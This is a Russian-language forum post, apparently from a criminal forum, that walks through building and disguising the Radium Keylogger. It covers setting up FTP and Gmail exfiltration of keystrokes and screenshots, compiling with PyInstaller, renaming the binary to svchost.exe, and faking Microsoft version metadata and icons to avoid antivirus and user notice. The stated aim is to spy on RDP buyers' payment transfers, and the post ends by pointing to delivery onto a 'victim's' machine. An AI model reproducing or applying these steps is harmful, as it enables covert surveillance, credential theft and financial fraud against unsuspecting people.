Гайд по общедоступному кейлогеру(не палится)

Здравствуйте детишки мои, я расскажу вам сказку. Я как всегда решил совместить приятное с полезным. Один хороший знакомый, продавец rdp дедиков, учеток и прочего, долго жаловался мне на то, что иногда после продажи он заходил на свой дедик и видел окна браузера с крупными переводами в киви и др. До того как он успевал что то сделать продавец естественно успевал либо удалить историю либо завершить перевод на другой кошелек (и т.д.). Мне надоело выслушивать его темные помыслы и я решил ему помочь. Заодно и другим участникам этого форума. У нас неоднократно уже обсуждалось что то вроде: "А не принесет ли кто на блюдечке кейлогер и т.д. не детектящийся антивирусами.". Сразу оговорюсь, что я пошел путем наименьшего сопротивления и решил долго не думая пошарить на гитхабе. Среди всего разнообразия вариантов нашелся и Radium Keylogger написанный на python2.7. После непродолжительного гугления выяснилось, что он широко обсуждался и публиковался на новостных сайтах чак что его описание и возможности лучше почитать там. Казалось бы что его сигнатуры уже как пол года должны быть в антивирусных базах. Но как выяснилось не тут то было. Постараюсь описывать как можно подробнее, как раз для категории лиц "подайте мне готовенькое".

Что нам понадобится?

1. Гуглим название "Radium Keylogger" и качаем все с гитхаба, распаковываем в рандомную папку.
2. Гуглим "Python2.7 скачать бесплатно без смс в высоком качестве" загружаем и устанавливаем с параметрами по умолчанию, единственное о чем хотелось бы сказать, что нужно выбрать ВСЕ компоненты для установки в окне выбора компонентов для установки соответственно. В противном случае вас ждут проблемы, не буду описывать подробностей.
3. Так же все загружаем и устанавливаем оттуда же, со страницы Radium Keylogger на гитхабе из раздела Requirements (PyHook; PyWin32; Microsoft Visual C++ Compiler for Python) кроме PyInstaller. Его мы установим ручками в следующем шаге.
4. Открываем PowerShell от имени администратора. Далее переходим в папку с распакованными исходниками с помощью команды:
cd С:\полный\путь\до\ исходников
Потом выполняем комманду

pip install pyinstaller
так же следом установим рекомендованные пакеты
pip install -r .\requirements.txt
5. Открываем исходник Radiumkeylogger.py в вашем любимом текстовом редакторе можете хоть в Word.
Ищем строки

ip = base64.b64decode("") #IP to connect to FTP server адрес или домен ФТП сервера.
ftpkey = base64.b64decode("") #FTP password Пароль от ФТП сервера.
ftpuser = base64.b64decode("") #FTP username Имя пользователя ФТП сервера.
passkey = base64.b64decode("") #Password to connect to GMAIL smtp server Пароль от почты.
userkey = base64.b64decode("") #Username to connect to GMAIL smtp server Имя пользователя.

из названия не трудно догадаться что для чего. Но все же скажу что нужно сделать. Заменяем значения вида base64.b64decode("") на просто тупо "ваше значение". Если не лень можете сконвертировать ваши данные в кодировку base64 с помощью любого онлайн конвертера и прописать значение в кавычки между скобок.
6. Пройдемся по исходнику и для порядка и маскировки поправим везде где упоминается "AdobePush.exe" на "svchost.exe". Так же заменим "Radiumkeylogger.py" и "AdobePush.py" на svchost.exe для обеспечения работоспособности автозагрузки.

7. Компилируем все в исполняемый файл, в том же окне PowerShell
выполняем команду


pyinstaller --onefile --windowed Radiumkeylogger.py


Если вы все делали правильно в папке с исходниками появится пара папок. В папке dist и будет ваш долгожданный кейлогер. Весит сие чудо 9100Kb. Что очень печально для малвари должен я сказать, но ничего не поделаешь, я не стал заморачиваться ибо не для себя. Тем более, что стандартный svchost иногда и все 50Mb отжирает и если он будет весить 20Kb может вызвать подозрение у опытного пользователя.
8. На этом еще не все, с паковкой и криптом можете сами заморочиться, мы сейчас же произведем базовую маскировку. Качаем и устанавливаем программы VerPatch и Resource Hacker. Для вашего удобства выбрал самое общедоступное.
9. Переименовываем получившийся файл в svchost.exe. Открываем с помощью Resource Hacker библиотеку /Windows/system32/imageres.dll и сохраняем все ее ресурсы в какую либо папку, думаю с функционалом этой программы вы разобраться в состоянии. Далее открываем наш кейлогер и заменяем его иконку на 15.ico это стандартная иконка для приложений внутри которых нет ресурсов, с этой же иконкой и отображаются основные системные процессы Windows. Сохраняем и выходим.
10. Копируем наш файл в папку с распакованным VerPatch. Открываем командную строку и переходим в эту папку. Выполняем команду:

verpatch svchost.exe 6.3.9600.0 /va /s description "Host Process for Windows Services" /s product "Microsoft Windows"
Если система с российской локалью замените "Host Process for Windows Services" на Хост процесс для сервисов Windows" или как там мать её.
После этого наш кейлогер будет палиться только тем что запущен от имени пользователя. Впрочем и эту проблему можно легко решить погуглив пару минут.

11. Все. Можно запускать и проверять электронную почту, после запуска должно придти уведомление на электронную почту что все ОК. Хотелось бы предупредить, что логи отправляются по умолчанию после набора 300 символов скриншоты после набора 500 символов, скриншоты пакуются по 10 штук и отправляются на почту как и логи. Естественно покопавшись ручками в исходнике все значения можно заменить под ваши требования.

Как вы видите он не детектится основными антивирусами лишь только какими то совсем экзотическими. Вам остается только решить вопрос доставки его на машину жертвы, но это уже совсем другая история.










 

Комментарии

Сверху